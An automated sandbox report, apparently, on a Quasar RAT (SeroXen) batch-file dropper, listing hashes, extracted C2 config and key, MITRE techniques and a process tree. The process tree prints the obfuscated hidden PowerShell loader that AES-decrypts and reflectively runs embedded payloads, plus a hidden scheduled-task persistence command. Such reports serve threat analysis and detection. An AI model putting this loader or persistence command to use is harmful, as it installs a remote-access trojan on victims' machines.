quasar | 38050d3e9a2d09088d05a9a586ad93d139c84439ae995d42cbbaed70fdd77ea7

General

Target

$sxr-Uni.bat
Size

1004KB
MD5

87135909ef2fbb7168cd05d0e39fa129
SHA1

1c2a864813a5cf5fb12a3e92f80c8ea90b5d7799
SHA256

38050d3e9a2d09088d05a9a586ad93d139c84439ae995d42cbbaed70fdd77ea7
SHA512

93475323429a7084902ba12d8ae8ba006de046dfcce62d7acd219f4ec856e561b3f1b036661a52de1950359a61dc1dd8fc52c8b3ea8e1756be04ae0a071ac547
SSDEEP

24576:Aj9+DnG6YVMFMTnd9x6osRvWc2mjJRiW7+wjHRjX:NGppndjT6dxjX

Score

10^/10

quasar seroxen execution spyware trojan

Malware Config

Extracted

Family

quasar

Attributes

reconnect_delay
3000

Extracted

Family

quasar

Version

3.1.5

Botnet

SeroXen

C2

uk2.localto.net:3362

Mutex

$Sxr-CHcUwDREE2aL5huOTd

Attributes

encryption_key
8v1KwkaFypjEiZ1Virk0
install_name
Client.exe
log_directory
$sxr-cmd
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 4 IoCs

Processes:

resource	yara_rule
behavioral3/memory/2068-22-0x0000000007DA0000-0x0000000007E92000-memory.dmp	family_quasar
behavioral3/memory/3904-80-0x000000000A3C0000-0x000000000A42C000-memory.dmp	family_quasar
C:\Users\Admin\AppData\Local\Temp\$sxr-Uni.exe	family_quasar
behavioral3/memory/1780-100-0x00000000006C0000-0x000000000072C000-memory.dmp	family_quasar

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

2068 powershell.exe
3220 powershell.exe
3904 powershell.exe
Executes dropped EXE 1 IoCs

Processes:

$sxr-Uni.exe

pid process

1780 $sxr-Uni.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

1 ip-api.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
2068	powershell.exe
3220	powershell.exe
3904	powershell.exe

pid	process
1780	$sxr-Uni.exe

flow	ioc
1	ip-api.com

Checks processor information in registry 2 TTPs 7 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wermgr.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

wermgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe

Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings powershell.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

2068 powershell.exe
2068 powershell.exe
3220 powershell.exe
3220 powershell.exe
3904 powershell.exe
3904 powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings	powershell.exe

pid	process
2068	powershell.exe
2068	powershell.exe
3220	powershell.exe
3220	powershell.exe
3904	powershell.exe
3904	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2068	powershell.exe
Token: SeDebugPrivilege	3220	powershell.exe
Token: SeIncreaseQuotaPrivilege	3220	powershell.exe
Token: SeSecurityPrivilege	3220	powershell.exe
Token: SeTakeOwnershipPrivilege	3220	powershell.exe
Token: SeLoadDriverPrivilege	3220	powershell.exe
Token: SeSystemProfilePrivilege	3220	powershell.exe
Token: SeSystemtimePrivilege	3220	powershell.exe
Token: SeProfSingleProcessPrivilege	3220	powershell.exe
Token: SeIncBasePriorityPrivilege	3220	powershell.exe
Token: SeCreatePagefilePrivilege	3220	powershell.exe
Token: SeBackupPrivilege	3220	powershell.exe
Token: SeRestorePrivilege	3220	powershell.exe
Token: SeShutdownPrivilege	3220	powershell.exe
Token: SeDebugPrivilege	3220	powershell.exe
Token: SeSystemEnvironmentPrivilege	3220	powershell.exe
Token: SeRemoteShutdownPrivilege	3220	powershell.exe
Token: SeUndockPrivilege	3220	powershell.exe
Token: SeManageVolumePrivilege	3220	powershell.exe
Token: 33	3220	powershell.exe
Token: 34	3220	powershell.exe
Token: 35	3220	powershell.exe
Token: 36	3220	powershell.exe
Token: SeIncreaseQuotaPrivilege	3220	powershell.exe
Token: SeSecurityPrivilege	3220	powershell.exe
Token: SeTakeOwnershipPrivilege	3220	powershell.exe
Token: SeLoadDriverPrivilege	3220	powershell.exe
Token: SeSystemProfilePrivilege	3220	powershell.exe
Token: SeSystemtimePrivilege	3220	powershell.exe
Token: SeProfSingleProcessPrivilege	3220	powershell.exe
Token: SeIncBasePriorityPrivilege	3220	powershell.exe
Token: SeCreatePagefilePrivilege	3220	powershell.exe
Token: SeBackupPrivilege	3220	powershell.exe
Token: SeRestorePrivilege	3220	powershell.exe
Token: SeShutdownPrivilege	3220	powershell.exe
Token: SeDebugPrivilege	3220	powershell.exe
Token: SeSystemEnvironmentPrivilege	3220	powershell.exe
Token: SeRemoteShutdownPrivilege	3220	powershell.exe
Token: SeUndockPrivilege	3220	powershell.exe
Token: SeManageVolumePrivilege	3220	powershell.exe
Token: 33	3220	powershell.exe
Token: 34	3220	powershell.exe
Token: 35	3220	powershell.exe
Token: 36	3220	powershell.exe
Token: SeIncreaseQuotaPrivilege	3220	powershell.exe
Token: SeSecurityPrivilege	3220	powershell.exe
Token: SeTakeOwnershipPrivilege	3220	powershell.exe
Token: SeLoadDriverPrivilege	3220	powershell.exe
Token: SeSystemProfilePrivilege	3220	powershell.exe
Token: SeSystemtimePrivilege	3220	powershell.exe
Token: SeProfSingleProcessPrivilege	3220	powershell.exe
Token: SeIncBasePriorityPrivilege	3220	powershell.exe
Token: SeCreatePagefilePrivilege	3220	powershell.exe
Token: SeBackupPrivilege	3220	powershell.exe
Token: SeRestorePrivilege	3220	powershell.exe
Token: SeShutdownPrivilege	3220	powershell.exe
Token: SeDebugPrivilege	3220	powershell.exe
Token: SeSystemEnvironmentPrivilege	3220	powershell.exe
Token: SeRemoteShutdownPrivilege	3220	powershell.exe
Token: SeUndockPrivilege	3220	powershell.exe
Token: SeManageVolumePrivilege	3220	powershell.exe
Token: 33	3220	powershell.exe
Token: 34	3220	powershell.exe
Token: 35	3220	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

$sxr-Uni.exe

pid process

1780 $sxr-Uni.exe

pid	process
1780	$sxr-Uni.exe

Suspicious use of WriteProcessMemory 21 IoCs

Processes:

cmd.exepowershell.exeWScript.execmd.exepowershell.exe

description	pid	process	target process
PID 2924 wrote to memory of 2068	2924	cmd.exe	powershell.exe
PID 2924 wrote to memory of 2068	2924	cmd.exe	powershell.exe
PID 2924 wrote to memory of 2068	2924	cmd.exe	powershell.exe
PID 2068 wrote to memory of 3220	2068	powershell.exe	powershell.exe
PID 2068 wrote to memory of 3220	2068	powershell.exe	powershell.exe
PID 2068 wrote to memory of 3220	2068	powershell.exe	powershell.exe
PID 2068 wrote to memory of 2792	2068	powershell.exe	WScript.exe
PID 2068 wrote to memory of 2792	2068	powershell.exe	WScript.exe
PID 2068 wrote to memory of 2792	2068	powershell.exe	WScript.exe
PID 2792 wrote to memory of 3548	2792	WScript.exe	cmd.exe
PID 2792 wrote to memory of 3548	2792	WScript.exe	cmd.exe
PID 2792 wrote to memory of 3548	2792	WScript.exe	cmd.exe
PID 3548 wrote to memory of 3904	3548	cmd.exe	powershell.exe
PID 3548 wrote to memory of 3904	3548	cmd.exe	powershell.exe
PID 3548 wrote to memory of 3904	3548	cmd.exe	powershell.exe
PID 3904 wrote to memory of 1780	3904	powershell.exe	$sxr-Uni.exe
PID 3904 wrote to memory of 1780	3904	powershell.exe	$sxr-Uni.exe
PID 3904 wrote to memory of 1780	3904	powershell.exe	$sxr-Uni.exe
PID 3904 wrote to memory of 1820	3904	powershell.exe	wermgr.exe
PID 3904 wrote to memory of 1820	3904	powershell.exe	wermgr.exe
PID 3904 wrote to memory of 1820	3904	powershell.exe	wermgr.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\$sxr-Uni.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2924

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZuUSVdDzzqEQUY+YLsQ5Gj5wKfn0tqq012ohBylrVEE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vggS0zw77JyIF8H43aLbbQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GZkhM=New-Object System.IO.MemoryStream(,$param_var); $oEEbG=New-Object System.IO.MemoryStream; $cBLwn=New-Object System.IO.Compression.GZipStream($GZkhM, [IO.Compression.CompressionMode]::Decompress); $cBLwn.CopyTo($oEEbG); $cBLwn.Dispose(); $GZkhM.Dispose(); $oEEbG.Dispose(); $oEEbG.ToArray();}function execute_function($param_var,$param2_var){ $YTJuF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $BaFCg=$YTJuF.EntryPoint; $BaFCg.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\$sxr-Uni.bat';$pjodI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\$sxr-Uni.bat').Split([Environment]::NewLine);foreach ($SxOOI in $pjodI) { if ($SxOOI.StartsWith(':: ')) { $tIbAV=$SxOOI.Substring(3); break; }}$payloads_var=[string[]]$tIbAV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2068

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_527_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_527.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3220

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_527.vbs"
3⤵
- Suspicious use of WriteProcessMemory
PID:2792

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_527.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:3548

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZuUSVdDzzqEQUY+YLsQ5Gj5wKfn0tqq012ohBylrVEE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vggS0zw77JyIF8H43aLbbQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GZkhM=New-Object System.IO.MemoryStream(,$param_var); $oEEbG=New-Object System.IO.MemoryStream; $cBLwn=New-Object System.IO.Compression.GZipStream($GZkhM, [IO.Compression.CompressionMode]::Decompress); $cBLwn.CopyTo($oEEbG); $cBLwn.Dispose(); $GZkhM.Dispose(); $oEEbG.Dispose(); $oEEbG.ToArray();}function execute_function($param_var,$param2_var){ $YTJuF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $BaFCg=$YTJuF.EntryPoint; $BaFCg.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_527.bat';$pjodI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_527.bat').Split([Environment]::NewLine);foreach ($SxOOI in $pjodI) { if ($SxOOI.StartsWith(':: ')) { $tIbAV=$SxOOI.Substring(3); break; }}$payloads_var=[string[]]$tIbAV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3904

C:\Users\Admin\AppData\Local\Temp\$sxr-Uni.exe
"C:\Users\Admin\AppData\Local\Temp\$sxr-Uni.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1780

C:\Windows\SysWOW64\wermgr.exe
"C:\Windows\system32\wermgr.exe" "-outproc" "0" "3904" "2652" "2304" "2644" "0" "0" "2660" "0" "0" "0" "0" "0"
6⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:1820

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
8ba8fc1034d449222856ea8fa2531e28

SHA1
7570fe1788e57484c5138b6cead052fbc3366f3e

SHA256
2e72609b2c93e0660390a91c8e5334d62c7b17cd40f9ae8afcc767d345cc12f2

SHA512
7ee42c690e5db3818e445fa8f50f5db39973f8caf5fce0b4d6261cb5a637e63f966c5f1734ee743b9bf30bcf8d18aa70ceb65ed41035c2940d4c6d34735e0d7b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
17KB

MD5
81a21dd5ff376076ce4ea5b787889e19

SHA1
052c32cc977f28c2ec9aa688c5c6ccf2f68f2a05

SHA256
b2d585b1da82cd61833fe0e2cbcfa4cb7a024076a0b2ed7cefbde1b2fa78dfeb

SHA512
68c39303934442e30721d3bd23b33050e87c16b5f8365d635c12e516795e557fe56a4a5c2f0f8bfec96339e09052186926b1adc01fa8e0868545333df0336ea7

Download Submit
C:\Users\Admin\AppData\Local\Temp\$sxr-Uni.exe
Filesize
409KB

MD5
95b900961b79bdde26d9aa9b7dd0d45f

SHA1
fa92ee8cb299cb3e7565c4d8fe5071a902e2fd08

SHA256
a3c2d3cb1d3aac5f6a85fcc8654d1f36671b4d0d9cb49c8187dc973fdc4637f0

SHA512
6cc027d2b156842274fc170d9dc3bf62274fecd06af8cc863d0101e559605cfc162f43fdd2fe2798446d7717b25b244365d96a6891fe7f07d01fc1e8f53bb2ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\Install.exe
Filesize
164KB

MD5
bec10290154b8590c20abe2e49096d21

SHA1
ac36297e505124cdf3db5f07ee595cb1d95187ea

SHA256
a0739bd54451695e2a7861a6845c59079b8a08d4543f883ec63fc3d5ac357107

SHA512
583b0e21f13fcbc3b5a02018b30baa8fb0180ff43b7aa8cf21cfde47122cf632d5452b311bcbc2dc1acc6587510a764b01984e9b567bbec9bfadbbb4e76cf97d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_44ueie3s.2m4.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_527.bat
Filesize
1004KB

MD5
87135909ef2fbb7168cd05d0e39fa129

SHA1
1c2a864813a5cf5fb12a3e92f80c8ea90b5d7799

SHA256
38050d3e9a2d09088d05a9a586ad93d139c84439ae995d42cbbaed70fdd77ea7

SHA512
93475323429a7084902ba12d8ae8ba006de046dfcce62d7acd219f4ec856e561b3f1b036661a52de1950359a61dc1dd8fc52c8b3ea8e1756be04ae0a071ac547

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_527.vbs
Filesize
115B

MD5
f93163321c00180e32ba98c81eafc0fe

SHA1
1af209d565d888c3709f25929ee23aece46efde5

SHA256
c55cbdee39a9d483cc7a0af0f70fc28dfd853521eeace70bddaa82c8b678d199

SHA512
9ced0d257a9fb5f813492abee3926f56dd29073cc0bf8fedb5b86a8206f4934f9a66ac39fb32d5fbe285e3d0d85966727c99dfc8d2c1287fb671ec12e1c835b1

Download Submit
memory/1780-111-0x0000000006780000-0x000000000678A000-memory.dmp

Filesize
40KB

Download
memory/1780-109-0x0000000006400000-0x000000000643C000-memory.dmp

Filesize
240KB

Download
memory/1780-108-0x0000000005FD0000-0x0000000005FE2000-memory.dmp

Filesize
72KB

Download
memory/1780-100-0x00000000006C0000-0x000000000072C000-memory.dmp

Filesize
432KB

Download
memory/2068-18-0x0000000005BC0000-0x0000000005C0C000-memory.dmp

Filesize
304KB

Download
memory/2068-0-0x000000007523E000-0x000000007523F000-memory.dmp

Filesize
4KB

Download
memory/2068-20-0x0000000007CB0000-0x0000000007CCA000-memory.dmp

Filesize
104KB

Download
memory/2068-21-0x0000000007C50000-0x0000000007C58000-memory.dmp

Filesize
32KB

Download
memory/2068-22-0x0000000007DA0000-0x0000000007E92000-memory.dmp

Filesize
968KB

Download
memory/2068-23-0x0000000009F60000-0x000000000A506000-memory.dmp

Filesize
5.6MB

Download
memory/2068-1-0x0000000004780000-0x00000000047B6000-memory.dmp

Filesize
216KB

Download
memory/2068-3-0x0000000004F20000-0x000000000554A000-memory.dmp

Filesize
6.2MB

Download
memory/2068-2-0x0000000075230000-0x00000000759E1000-memory.dmp

Filesize
7.7MB

Download
memory/2068-19-0x0000000008330000-0x00000000089AA000-memory.dmp

Filesize
6.5MB

Download
memory/2068-4-0x0000000075230000-0x00000000759E1000-memory.dmp

Filesize
7.7MB

Download
memory/2068-5-0x0000000004D80000-0x0000000004DA2000-memory.dmp

Filesize
136KB

Download
memory/2068-6-0x0000000005550000-0x00000000055B6000-memory.dmp

Filesize
408KB

Download
memory/2068-75-0x0000000075230000-0x00000000759E1000-memory.dmp

Filesize
7.7MB

Download
memory/2068-7-0x00000000055C0000-0x0000000005626000-memory.dmp

Filesize
408KB

Download
memory/2068-16-0x0000000005630000-0x0000000005987000-memory.dmp

Filesize
3.3MB

Download
memory/2068-17-0x0000000005B20000-0x0000000005B3E000-memory.dmp

Filesize
120KB

Download
memory/3220-37-0x0000000071420000-0x000000007146C000-memory.dmp

Filesize
304KB

Download
memory/3220-36-0x0000000006D90000-0x0000000006DC4000-memory.dmp

Filesize
208KB

Download
memory/3220-54-0x0000000075230000-0x00000000759E1000-memory.dmp

Filesize
7.7MB

Download
memory/3220-57-0x0000000075230000-0x00000000759E1000-memory.dmp

Filesize
7.7MB

Download
memory/3220-52-0x00000000071F0000-0x0000000007286000-memory.dmp

Filesize
600KB

Download
memory/3220-51-0x0000000006FE0000-0x0000000006FEA000-memory.dmp

Filesize
40KB

Download
memory/3220-50-0x0000000075230000-0x00000000759E1000-memory.dmp

Filesize
7.7MB

Download
memory/3220-49-0x0000000075230000-0x00000000759E1000-memory.dmp

Filesize
7.7MB

Download
memory/3220-48-0x0000000006E20000-0x0000000006EC4000-memory.dmp

Filesize
656KB

Download
memory/3220-25-0x0000000075230000-0x00000000759E1000-memory.dmp

Filesize
7.7MB

Download
memory/3220-34-0x0000000075230000-0x00000000759E1000-memory.dmp

Filesize
7.7MB

Download
memory/3220-47-0x0000000006DF0000-0x0000000006E0E000-memory.dmp

Filesize
120KB

Download
memory/3220-46-0x0000000075230000-0x00000000759E1000-memory.dmp

Filesize
7.7MB

Download
memory/3220-53-0x0000000007170000-0x0000000007181000-memory.dmp

Filesize
68KB

Download
memory/3220-35-0x0000000075230000-0x00000000759E1000-memory.dmp

Filesize
7.7MB

Download
memory/3904-81-0x000000000A4D0000-0x000000000A562000-memory.dmp

Filesize
584KB

Download
memory/3904-80-0x000000000A3C0000-0x000000000A42C000-memory.dmp

Filesize
432KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads